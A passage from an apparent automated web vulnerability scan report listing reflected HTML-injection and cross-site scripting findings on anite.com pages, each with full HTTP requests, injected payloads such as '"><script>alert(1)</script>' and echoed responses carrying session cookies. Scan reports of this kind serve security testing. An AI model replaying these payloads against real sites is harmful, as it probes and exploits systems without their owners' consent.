<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/wireless-handset-conformance-testing-anite.html?fbb3d"><a>2e5fc7790c3=1#up">
...[SNIP]...

1.250. http://anite.com/wireless-handset-development-testing-anite.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/wireless-handset-development-testing-anite.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b0da"><a>952dd973f44 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wireless-handset-development-testing-anite.html?Itemid=615b0da"><a>952dd973f44 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:09:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/wireless-handset-development-testing-anite.html?Itemid=615b0da"><a>952dd973f44#up">
...[SNIP]...

1.251. http://anite.com/wireless-handset-development-testing-anite.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/wireless-handset-development-testing-anite.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1d42"><script>alert(1)</script>7d8f485efb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d1d42"><script>alert(1)</script>7d8f485efb8 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:09:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/d1d42"><script>alert(1)</script>7d8f485efb8#up">
...[SNIP]...

1.252. http://anite.com/wireless-handset-development-testing-anite.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/wireless-handset-development-testing-anite.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c286d"><a>5d68df48301 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wireless-handset-development-testing-anite.html?c286d"><a>5d68df48301=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:09:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/wireless-handset-development-testing-anite.html?c286d"><a>5d68df48301=1#up">
...[SNIP]...

1.253. http://anite.com/wireless-handset-interoperability-testing-anite.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/wireless-handset-interoperability-testing-anite.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8efb"><a>19abf5dadaa was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wireless-handset-interoperability-testing-anite.html?Itemid=60e8efb"><a>19abf5dadaa HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:09:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/wireless-handset-interoperability-testing-anite.html?Itemid=60e8efb"><a>19abf5dadaa#up">
...[SNIP]...

1.254. http://anite.com/wireless-handset-interoperability-testing-anite.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/wireless-handset-interoperability-testing-anite.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56af0"><script>alert(1)</script>56f4123ca82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /56af0"><script>alert(1)</script>56f4123ca82 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:09:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:38 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/56af0"><script>alert(1)</script>56f4123ca82#up">
...[SNIP]...

1.255. http://anite.com/wireless-handset-interoperability-testing-anite.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/wireless-handset-interoperability-testing-anite.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca129"><a>757625579b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wireless-handset-interoperability-testing-anite.html?ca129"><a>757625579b=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:09:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/wireless-handset-interoperability-testing-anite.html?ca129"><a>757625579b=1#up">
...[SNIP]...

1.256. http://anite.com/wireless-management-team-nemo-2.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/wireless-management-team-nemo-2.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e6e0"><a>32e853577c3 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wireless-management-team-nemo-2.html?Itemid=2163e6e0"><a>32e853577c3 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:11:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:11:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/wireless-management-team-nemo-2.html?Itemid=2163e6e0"><a>32e853577c3#up">
...[SNIP]...

1.257. http://anite.com/wireless-management-team-nemo-2.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/wireless-management-team-nemo-2.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7f5c"><script>alert(1)</script>8b568c543c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d7f5c"><script>alert(1)</script>8b568c543c1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:12:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:12:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/d7f5c"><script>alert(1)</script>8b568c543c1#up">
...[SNIP]...

1.258. http://anite.com/wireless-management-team-nemo-2.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/wireless-management-team-nemo-2.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb3b8"><a>017481a7353 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wireless-management-team-nemo-2.html?eb3b8"><a>017481a7353=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:11:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:11:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/wireless-management-team-nemo-2.html?eb3b8"><a>017481a7353=1#up">
...[SNIP]...

1.259. http://anite.com/wireless-management-team.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/wireless-management-team.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c11ee"><a>38d9081decd was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wireless-management-team.html?Itemid=215c11ee"><a>38d9081decd HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:11:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:11:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/wireless-management-team.html?Itemid=215c11ee"><a>38d9081decd#up">
...[SNIP]...

1.260. http://anite.com/wireless-management-team.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/wireless-management-team.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2f6f"><script>alert(1)</script>65618048bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e2f6f"><script>alert(1)</script>65618048bf HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:11:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:11:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/e2f6f"><script>alert(1)</script>65618048bf#up">
...[SNIP]...

1.261. http://anite.com/wireless-management-team.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/wireless-management-team.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fcf7"><a>3f322d0d7d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wireless-management-team.html?7fcf7"><a>3f322d0d7d0=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:11:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:11:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/wireless-management-team.html?7fcf7"><a>3f322d0d7d0=1#up">
...[SNIP]...

1.262. http://anite.com/wireless-news-2.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/wireless-news-2.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 658c6"><a>1b6e1b239ec was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wireless-news-2.html?Itemid=658c6"><a>1b6e1b239ec HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:11:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:11:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/wireless-news-2.html?Itemid=658c6"><a>1b6e1b239ec#up">
...[SNIP]...

1.263. http://anite.com/wireless-news-2.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/wireless-news-2.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23e8f"><script>alert(1)</script>6559b8419f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /23e8f"><script>alert(1)</script>6559b8419f HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:10:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:10:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/23e8f"><script>alert(1)</script>6559b8419f#up">
...[SNIP]...

1.264. http://anite.com/wireless-news-2.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/wireless-news-2.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b652a"><a>07c58918796 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wireless-news-2.html?b652a"><a>07c58918796=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:10:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:10:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
